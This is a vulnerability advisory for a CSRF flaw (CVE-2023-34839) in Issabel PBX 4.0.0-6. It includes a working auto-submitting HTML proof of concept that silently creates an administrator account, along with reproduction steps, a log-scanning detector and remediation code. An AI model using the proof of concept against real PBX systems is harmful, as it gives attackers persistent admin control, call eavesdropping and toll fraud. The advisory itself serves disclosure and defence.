- Overview
- Vulnerability Details
- Affected Software
- CVSS Score
- Attack Scenario
- Proof of Concept (PoC)
- Steps to Reproduce
- Impact
- Remediation
- References
- Disclaimer
## Overview

CVE-2023-34839 is a Cross-Site Request Forgery (CSRF) vulnerability discovered in Issabel PBX version 4.0.0-6, a widely used open-source Unified Communications platform. The vulnerability resides in the user-management endpoint and allows an unauthenticated remote attacker to silently create a new administrator account by tricking a currently authenticated administrator into visiting a specially crafted webpage.
| Field | Value |
|---|---|
| CVE ID | CVE-2023-34839 |
| Date | 23 June 2023 |
| Researcher | Sahil Ojha |
| Vendor | Issabel |
| Product | Issabel PBX |
| Version | 4.0.0-6 |
| Tested On | Windows |
## Vulnerability Details

Issabel PBX 4.0.0-6 does not implement CSRF protections (e.g., synchronizer tokens, SameSite cookie attributes, or Origin / Referer header validation) on the user creation endpoint:

```http
POST /index.php?menu=userlist&action=new
```

Because the application relies solely on session cookies for authentication and performs no state-changing request validation, a forged POST request submitted from any origin will be accepted and processed with the full privileges of the logged-in administrator session.
Root cause: Absence of anti-CSRF token validation on state-changing administrative endpoints.
Vulnerability class: CWE-352 — Cross-Site Request Forgery (CSRF)
## Affected Software

| Software | Version | Status |
|---|---|---|
| Issabel PBX | 4.0.0-6 | Vulnerable ✔ |
- Vendor Homepage: https://www.issabel.org/
- Source Code: https://github.com/IssabelFoundation/issabelPBX
## CVSS Score

| Metric | Value |
|---|---|
| CVSS v3.1 Vector | AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H |
| Base Score | 8.8 (High) |
| Attack Vector | Network |
| Attack Complexity | Low |
| Privileges Required | None |
| User Interaction | Required (admin visit) |
| Scope | Unchanged |
| Confidentiality | High |
| Integrity | High |
| Availability | High |
## Attack Scenario

An attacker can exploit this vulnerability by following these high-level steps:
- Craft a malicious HTML page that contains a hidden form targeting the Issabel PBX user-creation endpoint with attacker-controlled values (username, password, group = administrator).
- Host the malicious page on a server or send it to the target administrator via phishing email, chat message, or any social-engineering vector.
- Wait for the administrator to open the link while having an active, authenticated session with the Issabel PBX application.
- The browser auto-submits the form using the victim's existing session cookie, causing the application to silently create a new administrator account.
- The attacker logs in with the newly created credentials and has full administrator access to the PBX system, including call routing, recordings, SIP trunk configuration, and all system settings.
No interaction beyond a single page visit is required from the victim.
## Proof of Concept (PoC)

⚠️ For educational and authorised testing purposes only.

Replace `localhost` with the hostname or IP address of the target Issabel PBX instance.

If testing against an `https://` endpoint with a self-signed certificate, you must first visit the target URL in the same browser and accept the certificate warning; otherwise the browser will block the cross-origin form submission.
```html
<html>
<!-- CSRF Exploit — CVE-2023-34839 -->
<body>
  <form action="https://localhost/index.php?menu=userlist&action=new" method="POST">
    <input type="hidden" name="save" value="Save" />
    <input type="hidden" name="name" value="CSRF" />
    <input type="hidden" name="description" value="CSRF Test Account" />
    <input type="hidden" name="password1" value="Test@123" />
    <input type="hidden" name="password2" value="Test@123" />
    <input type="hidden" name="group" value="1" /> <!-- 1 = Administrator -->
    <input type="hidden" name="extension" value="" />
    <input type="hidden" name="webmailuser" value="" />
    <input type="hidden" name="webmaildomain" value="" />
    <input type="hidden" name="webmailpassword1" value="" />
    <input type="hidden" name="id_user" value="" />
    <input type="submit" value="Submit request" />
  </form>
  <script>
    history.pushState('', '', '/');
    document.forms[0].submit();
  </script>
</body>
</html>
```

The exploit file is also available in this repository: `CSRF Exploit.html`
## Steps to Reproduce

Prerequisites:

- A running Issabel PBX 4.0.0-6 instance.
- An administrator account with an active browser session.
- A browser on the same machine as the administrator session.
1. Navigate to the Issabel PBX web interface and log in with administrator credentials.
2. Copy the PoC HTML code above and save it as a `.html` file, replacing `localhost` with the actual hostname or IP address of the target Issabel instance. The exploit uses hidden form fields to silently POST a new user creation request to the application. When the page loads, the embedded JavaScript immediately submits the form without any visible user action.
3. Open the saved HTML file in the same browser (in a new tab) while the administrator session is still active. The form will be auto-submitted immediately upon page load.
4. Navigate back to the Issabel PBX User Management panel. A new user account (in this PoC, named `CSRF`) will have been created with full Administrator privileges — without any additional interaction beyond opening the exploit page.
## Impact

Successful exploitation of CVE-2023-34839 allows an attacker to:
- Create rogue administrator accounts on the PBX system, providing persistent full-privilege access.
- Modify call routing and SIP trunks, enabling eavesdropping or toll fraud.
- Access voicemail recordings and call detail records (CDRs), leading to sensitive information disclosure.
- Lock out legitimate administrators by changing passwords or deleting existing accounts.
- Disrupt communications by altering or deleting PBX configuration.
Because the rogue account persists even after the victim's session ends, the attacker retains access indefinitely until the account is discovered and removed.
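A rogue account created this way leaves a trace in the web server's access log, because the forged POST arrives either with no Referer (the PoC page is opened from a local file) or with a Referer from a foreign origin. As an added example that is not part of the original advisory, the following Python scans constructed Apache combined-format log lines for POSTs to the user-creation endpoint that show either shape; the log layout, the PBX hostname and the sample lines are assumptions.

```python
import re
from urllib.parse import urlsplit

# Apache "combined" access-log layout (assumed; adjust if the PBX host logs differently)
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
USER_CREATE_PATH = "/index.php?menu=userlist&action=new"  # endpoint named in the advisory

def referer_origin(referer):
    """Reduce a Referer value to scheme://host[:port]; None when the header was absent ('-')."""
    parts = urlsplit(referer) if referer not in ("", "-") else None
    if not parts or not parts.scheme or not parts.netloc:
        return None
    return f"{parts.scheme}://{parts.netloc}".lower()

def find_cross_site_user_creation(lines, pbx_origin):
    """Return (ip, timestamp, referer, reason) for every POST to the user-creation endpoint
    whose Referer is missing or names a different origin than the PBX itself."""
    pbx_origin = pbx_origin.lower()
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST" or m["path"] != USER_CREATE_PATH:
            continue
        origin = referer_origin(m["referer"])
        if origin is None:
            reason = "no Referer (form submitted from a local file or referrer stripped)"
        elif origin != pbx_origin:
            reason = f"cross-site Referer {origin}"
        else:
            continue  # same-origin submission from the PBX's own user form
        findings.append((m["ip"], m["ts"], m["referer"], reason))
    return findings

# Constructed sample lines, not from a real system: one legitimate same-origin creation,
# one with no Referer, one from a foreign origin, and an unrelated GET.
SAMPLE_LOG = [
    '10.0.0.5 - - [23/Jun/2023:10:00:01 +0000] "POST /index.php?menu=userlist&action=new HTTP/1.1" 200 512 "https://pbx.example.internal/index.php?menu=userlist" "Mozilla/5.0"',
    '10.0.0.5 - - [23/Jun/2023:10:05:42 +0000] "POST /index.php?menu=userlist&action=new HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [23/Jun/2023:10:07:13 +0000] "POST /index.php?menu=userlist&action=new HTTP/1.1" 200 512 "http://attacker.example/csrf.html" "Mozilla/5.0"',
    '10.0.0.5 - - [23/Jun/2023:10:08:00 +0000] "GET /index.php?menu=userlist HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in find_cross_site_user_creation(SAMPLE_LOG, "https://pbx.example.internal"):
        print(*finding)
```

Every hit should be reconciled against the user list: a creation with no matching same-origin form submission is the signal to look for.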
## Remediation

Issabel PBX administrators and developers should apply the following mitigations:

- Implement Anti-CSRF Tokens: Generate a unique, unpredictable, session-tied token for every state-changing form. Validate the token server-side before processing any POST request.
- Apply `SameSite=Strict` or `SameSite=Lax` on Session Cookies: This instructs browsers not to send cookies on cross-site requests, effectively preventing classic CSRF attacks in modern browsers.
- Validate `Origin` and `Referer` Headers: Reject requests whose `Origin` or `Referer` header does not match the expected application domain.
- Require Re-authentication for Sensitive Actions: Prompt the administrator for their current password before allowing the creation of new administrator-level accounts.
- Apply the Latest Security Patches: Monitor the Issabel release page and the official repository for patches addressing this CVE.
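As an added example that is not Issabel's own code, the following framework-neutral Python shows the first three mitigations working together: a session-bound synchronizer token compared in constant time, an Origin/Referer check against the application's own origin, and a session cookie issued with `SameSite=Lax`, `Secure` and `HttpOnly`. The field name `csrf_token`, the cookie name `PHPSESSID` (PHP's default) and the `csrf_check` signature are assumptions.

```python
import hmac
import secrets
from urllib.parse import urlsplit
from http.cookies import SimpleCookie

TOKEN_FIELD = "csrf_token"    # hypothetical name for both the session slot and the hidden form field
SESSION_COOKIE = "PHPSESSID"  # assumed default PHP session cookie name

def issue_csrf_token(session):
    """Create one unpredictable token per session; embed it in every state-changing form."""
    if TOKEN_FIELD not in session:
        session[TOKEN_FIELD] = secrets.token_urlsafe(32)
    return session[TOKEN_FIELD]

def request_origin(headers):
    """Origin header if sent, else the origin part of Referer, else None."""
    if headers.get("Origin"):
        return headers["Origin"].lower()
    parts = urlsplit(headers.get("Referer", ""))
    if parts.scheme and parts.netloc:
        return f"{parts.scheme}://{parts.netloc}".lower()
    return None

def csrf_check(session, form, headers, expected_origin):
    """Gate a state-changing POST: the submitted token must equal the session copy
    (constant-time compare) and the request must come from our own origin."""
    expected = session.get(TOKEN_FIELD, "")
    submitted = form.get(TOKEN_FIELD, "")
    if not expected or not hmac.compare_digest(expected.encode(), submitted.encode()):
        return False, "missing or invalid CSRF token"
    origin = request_origin(headers)
    if origin != expected_origin.lower():
        return False, f"origin check failed ({origin or 'no Origin/Referer'})"
    return True, "ok"

def session_cookie(session_id):
    """Set-Cookie value for the session: SameSite=Lax keeps the browser from attaching it
    to a cross-site POST; Secure and HttpOnly harden it further."""
    c = SimpleCookie()
    c[SESSION_COOKIE] = session_id
    c[SESSION_COOKIE]["samesite"] = "Lax"
    c[SESSION_COOKIE]["secure"] = True
    c[SESSION_COOKIE]["httponly"] = True
    c[SESSION_COOKIE]["path"] = "/"
    return c.output(header="").strip()
```

A forged submission like the PoC form carries no token and arrives with no Origin or a foreign one, so it fails the first check before the user record is ever touched.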
## References

- NVD — CVE-2023-34839
- OWASP — Cross-Site Request Forgery (CSRF)
- CWE-352: Cross-Site Request Forgery
- Issabel Official Website
- IssabelFoundation/issabelPBX on GitHub
## Disclaimer

This repository is intended strictly for educational purposes and authorised security research. The information and proof-of-concept code provided here must only be used against systems you own or have explicit written permission to test. Unauthorised use of this exploit against systems you do not own is illegal and may result in criminal prosecution. The author assumes no liability for any misuse of the information contained in this repository.